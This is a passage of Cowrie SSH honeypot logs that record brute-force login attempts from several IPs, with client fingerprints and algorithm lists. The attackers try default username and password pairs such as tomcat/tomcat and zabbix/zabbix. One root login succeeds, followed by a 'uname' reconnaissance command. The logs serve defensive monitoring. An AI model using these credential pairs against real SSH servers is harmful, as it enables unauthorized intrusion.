-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:39:44.616932Z","src_ip":"196.251.86.249","session":"d1dbd98ab7f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49600,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0b7e32a8978","protocol":"ssh","message":"New connection: 212.227.125.160:49600 (1.2.3.4:22) [session: c0b7e32a8978]","sensor":"my-vps","timestamp":"2025-08-26T11:39:45.284257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:45.285441Z","src_ip":"212.227.125.160","session":"c0b7e32a8978"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:45.337377Z","src_ip":"212.227.125.160","session":"c0b7e32a8978"}
{"eventid":"cowrie.login.failed","username":"bin","password":"bin","message":"login attempt [bin/bin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:45.536083Z","src_ip":"212.227.125.160","session":"c0b7e32a8978"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"p@ssw0rd","message":"login attempt [hadoop/p@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:46.311992Z","src_ip":"196.251.86.249","session":"d1dbd98ab7f4"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:46.588106Z","src_ip":"212.227.125.160","session":"c0b7e32a8978"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:47.838334Z","src_ip":"196.251.86.249","session":"d1dbd98ab7f4"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34204,"dst_ip":"1.2.3.4","dst_port":22,"session":"b49e249fb4d0","protocol":"ssh","message":"New connection: 83.168.105.65:34204 (1.2.3.4:22) [session: b49e249fb4d0]","sensor":"my-vps","timestamp":"2025-08-26T11:39:50.938399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:50.939423Z","src_ip":"83.168.105.65","session":"b49e249fb4d0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:50.976442Z","src_ip":"83.168.105.65","session":"b49e249fb4d0"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:51.090282Z","src_ip":"83.168.105.65","session":"b49e249fb4d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50370,"dst_ip":"1.2.3.4","dst_port":22,"session":"27397d95372c","protocol":"ssh","message":"New connection: 212.227.125.160:50370 (1.2.3.4:22) [session: 27397d95372c]","sensor":"my-vps","timestamp":"2025-08-26T11:39:51.411041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:51.677353Z","src_ip":"212.227.125.160","session":"27397d95372c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:51.678280Z","src_ip":"212.227.125.160","session":"27397d95372c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:52.129313Z","src_ip":"83.168.105.65","session":"b49e249fb4d0"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:52.277619Z","src_ip":"212.227.125.160","session":"27397d95372c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:53.330897Z","src_ip":"212.227.125.160","session":"27397d95372c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51140,"dst_ip":"1.2.3.4","dst_port":22,"session":"164a41dfaa5e","protocol":"ssh","message":"New connection: 212.227.125.160:51140 (1.2.3.4:22) [session: 164a41dfaa5e]","sensor":"my-vps","timestamp":"2025-08-26T11:39:57.901062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:39:57.902297Z","src_ip":"212.227.125.160","session":"164a41dfaa5e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:39:57.957397Z","src_ip":"212.227.125.160","session":"164a41dfaa5e"}
{"eventid":"cowrie.login.failed","username":"sem4","password":"sem4","message":"login attempt [sem4/sem4] failed","sensor":"my-vps","timestamp":"2025-08-26T11:39:58.115889Z","src_ip":"212.227.125.160","session":"164a41dfaa5e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:39:59.167875Z","src_ip":"212.227.125.160","session":"164a41dfaa5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51910,"dst_ip":"1.2.3.4","dst_port":22,"session":"09a82d19e940","protocol":"ssh","message":"New connection: 212.227.125.160:51910 (1.2.3.4:22) [session: 09a82d19e940]","sensor":"my-vps","timestamp":"2025-08-26T11:40:03.262923Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:03.264141Z","src_ip":"212.227.125.160","session":"09a82d19e940"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:03.314320Z","src_ip":"212.227.125.160","session":"09a82d19e940"}
{"eventid":"cowrie.login.failed","username":"zabbix","password":"zabbix","message":"login attempt [zabbix/zabbix] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:03.479755Z","src_ip":"212.227.125.160","session":"09a82d19e940"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:04.534602Z","src_ip":"212.227.125.160","session":"09a82d19e940"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52218,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e1411e0e2b8","protocol":"ssh","message":"New connection: 83.168.105.65:52218 (1.2.3.4:22) [session: 9e1411e0e2b8]","sensor":"my-vps","timestamp":"2025-08-26T11:40:06.357354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:06.358193Z","src_ip":"83.168.105.65","session":"9e1411e0e2b8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:06.397957Z","src_ip":"83.168.105.65","session":"9e1411e0e2b8"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:40:06.518830Z","src_ip":"83.168.105.65","session":"9e1411e0e2b8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:40:06.656105Z","src_ip":"83.168.105.65","session":"9e1411e0e2b8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:40:06.656768Z","src_ip":"83.168.105.65","session":"9e1411e0e2b8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:06.697239Z","src_ip":"83.168.105.65","session":"9e1411e0e2b8"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:06.698557Z","src_ip":"83.168.105.65","session":"9e1411e0e2b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52680,"dst_ip":"1.2.3.4","dst_port":22,"session":"b205113322b6","protocol":"ssh","message":"New connection: 212.227.125.160:52680 (1.2.3.4:22) [session: b205113322b6]","sensor":"my-vps","timestamp":"2025-08-26T11:40:09.040965Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:09.052629Z","src_ip":"212.227.125.160","session":"b205113322b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:09.095675Z","src_ip":"212.227.125.160","session":"b205113322b6"}
{"eventid":"cowrie.login.failed","username":"odoo14","password":"odoo14","message":"login attempt [odoo14/odoo14] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:09.342529Z","src_ip":"212.227.125.160","session":"b205113322b6"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:10.539048Z","src_ip":"212.227.125.160","session":"b205113322b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53446,"dst_ip":"1.2.3.4","dst_port":22,"session":"892008f920fd","protocol":"ssh","message":"New connection: 212.227.125.160:53446 (1.2.3.4:22) [session: 892008f920fd]","sensor":"my-vps","timestamp":"2025-08-26T11:40:14.898398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:14.899740Z","src_ip":"212.227.125.160","session":"892008f920fd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:14.950199Z","src_ip":"212.227.125.160","session":"892008f920fd"}
{"eventid":"cowrie.login.failed","username":"solr","password":"solr","message":"login attempt [solr/solr] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:15.112417Z","src_ip":"212.227.125.160","session":"892008f920fd"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:40:16.165129Z","src_ip":"212.227.125.160","session":"892008f920fd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54216,"dst_ip":"1.2.3.4","dst_port":22,"session":"158346f078ba","protocol":"ssh","message":"New connection: 212.227.125.160:54216 (1.2.3.4:22) [session: 158346f078ba]","sensor":"my-vps","timestamp":"2025-08-26T11:40:20.338726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:20.351650Z","src_ip":"212.227.125.160","session":"158346f078ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:40:20.394527Z","src_ip":"212.227.125.160","session":"158346f078ba"}
{"eventid":"cowrie.login.failed","username":"emps","password":"emps","message":"login attempt [emps/emps] failed","sensor":"my-vps","timestamp":"2025-08-26T11:40:20.601203Z","src_ip":"212.227.125.160","session":"158346f078ba"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56274,"dst_ip":"1.2.3.4","dst_port":22,"session":"fa92b12f8a92","protocol":"ssh","message":"New connection: 83.168.105.65:56274 (1.2.3.4:22) [session: fa92b12f8a92]","sensor":"my-vps","timestamp":"2025-08-26T11:40:21.735740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:40:21.736547Z","src_ip":"83.168.105.65","session":"fa92b12f8a92"}
